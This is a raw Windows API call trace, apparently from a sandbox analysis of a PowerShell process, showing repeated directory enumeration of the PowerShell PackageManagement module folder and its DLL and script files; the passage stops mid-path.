FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0227.708] FindClose (in: hFindFile=0x25b73cd1ef0 | out: hFindFile=0x25b73cd1ef0) returned 1 [0227.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4a0) returned 1 [0227.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0227.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0227.708] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd21f0 [0227.709] FindNextFileW (in: hFindFile=0x25b73cd21f0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.709] FindNextFileW (in: hFindFile=0x25b73cd21f0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0227.709] FindNextFileW (in: hFindFile=0x25b73cd21f0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.709] FindClose (in: hFindFile=0x25b73cd21f0 | out: hFindFile=0x25b73cd21f0) returned 1 [0227.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0227.710] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd23d0 [0227.710] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.710] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0227.710] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0227.711] FindClose (in: hFindFile=0x25b73cd23d0 | out: hFindFile=0x25b73cd23d0) returned 1 [0227.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0227.711] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0d50 [0227.712] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.712] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0227.712] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0227.712] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0227.714] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0227.714] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0227.714] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0227.715] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0227.715] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0227.715] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0227.715] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0227.716] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0227.716] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0227.716] FindClose (in: hFindFile=0x25b73cd0d50 | out: hFindFile=0x25b73cd0d50) returned 1 [0227.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0227.717] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2010 [0227.717] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.717] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0227.718] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0227.718] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0227.718] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0227.718] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0227.718] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0227.719] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0227.719] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0227.719] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0227.719] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0227.720] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0227.720] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.720] FindClose (in: hFindFile=0x25b73cd2010 | out: hFindFile=0x25b73cd2010) returned 1 [0227.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.720] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0227.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d260) returned 1 [0227.720] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d340 | out: lpFileInformation=0x653ef8d340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d220) returned 1 [0227.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d2b0) returned 1 [0227.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Program 